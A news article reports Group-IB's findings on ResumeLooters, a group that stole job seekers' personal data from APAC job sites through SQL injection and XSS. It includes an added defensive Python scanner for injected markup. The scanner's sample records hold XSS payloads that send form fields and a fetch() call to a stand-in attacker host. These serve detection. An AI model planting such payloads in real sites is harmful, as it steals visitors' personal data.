Millions of people looking for a new job had their personal details stolen and put up for sale on dark web chat groups after several sites were breached.
Cybersecurity experts at Group-IB have published a new report outlining their investigation into a relatively new threat actor called ResumeLooters and how it was able to sell a huge database on the dark web.
ResumeLooters first emerged in November 2023, when it successfully compromised 65 retail and job posting sites using two techniques: SQL injection and cross-site scripting (XSS). With the help of tools such as SQLmap, Acunetix, X-Ray or Metasploit, the attackers were able to scan the web for vulnerable sites, automate the detection and exploitation of SQL injection flaws, develop and execute exploit code against targets, and more.
In it for the money
After successfully identifying and exploiting the flaws in the sites, the attackers proceeded to inject malicious scripts into different places in the HTML. At some injection points the script executes, while at others it is merely rendered as visible text, the researchers explained. The goal of the script is to display a phishing form that steals sensitive data from visitors.
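The observation above, that an injected script either executes or is merely displayed depending on where it lands in the HTML, is exactly what a site operator needs to check for after such a breach. The following is an added example, not code from Group-IB's report or from any affected site: it sweeps stored job-listing bodies for injected active markup (scripts, event handlers, and forms posting to a foreign host) and shows that escaped content only displays. The hostname and the listing records are constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "jobs.example.test"  # constructed: the job site's own hostname


class InjectionFinder(HTMLParser):
    """Collects markup that a stored listing body should never contain."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self.findings.append(("script", a.get("src") or "inline"))
        elif tag == "iframe":
            self.findings.append(("iframe", a.get("src") or "inline"))
        elif tag == "form":
            # A form whose action points off-site is a phishing/exfil form.
            host = urlparse(a.get("action") or "").hostname
            if host and host != SITE_HOST:
                self.findings.append(("form-exfil", host))
        # Inline event handlers (onload=, onerror=, ...) execute like scripts.
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.findings.append(("event-handler", f"{tag}@{name}"))


def scan_listing(body: str):
    """Return a list of (kind, detail) findings for one stored listing body."""
    finder = InjectionFinder()
    finder.feed(body)
    finder.close()
    return finder.findings


def render_safely(title: str) -> str:
    """Escaping turns injected markup into text: it displays, it does not run."""
    return f"<h2>{html.escape(title, quote=True)}</h2>"


# Constructed listing records standing in for rows from a listings table.
LISTINGS = {
    "clean": "<h2>Backend Engineer</h2><p>Apply via <a href='/apply'>form</a></p>",
    "phish": "<h2>Data Analyst</h2><form action='https://collector.attacker.test/c'>"
             "<input name='email'><input name='phone'></form>",
    "onerr": "<p>Sales</p><img src='x' onerror='fetch(\"//collector.attacker.test\")'>",
}
```

Running `scan_listing` over every stored body and reviewing the non-empty results gives a first inventory of which records a stored-XSS campaign of this kind has touched.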
The victims apparently had their full names, email addresses, phone numbers, employment history, education, and other relevant information taken. That is plenty of information for a spear phishing attack or even identity theft. Most of the victims are in the APAC part of the world, in countries such as Australia, Taiwan, China, Thailand, India and Vietnam.
After stealing the data, ResumeLooters attempted to sell it on the dark web, Group-IB added. They offered it on two Telegram channels, using accounts with Chinese names. Even the tools they used were in Chinese, leading researchers to conclude that ResumeLooters are most likely from China.
However, they do not appear to be state-sponsored, since the objective of the campaign was financial.
“In less than two months, we have identified another threat actor conducting SQL injection attacks against businesses in the Asia-Pacific region,” said Nikita Rostovcev, senior analyst with Group-IB's advanced persistent threat research team.
“It is surprising to see how some of the older but remarkably effective SQL attacks are still prevalent in the region. However, the tenacity of the ResumeLooters group stands out as they experiment with various methods to exploit vulnerabilities, including XSS attacks. Furthermore, the gang's attacks cover a vast geographic area.”